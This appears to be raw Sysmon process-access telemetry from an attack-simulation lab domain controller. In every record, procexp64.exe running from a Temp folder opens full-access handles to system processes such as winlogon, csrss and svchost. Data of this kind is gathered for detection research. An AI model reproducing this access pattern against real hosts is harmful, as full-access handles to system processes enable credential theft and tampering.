10341000x8000000000000000791235Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791234Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791233Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791232Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791231Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791230Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791229Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791228Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791227Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791226Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791225Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791224Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791223Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791222Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791221Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791220Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791219Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791218Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791217Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791216Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791215Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791214Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791213Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791212Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791211Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791210Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791209Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791208Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791207Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791206Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791205Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791204Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791203Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791202Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791201Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791200Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791199Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791198Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 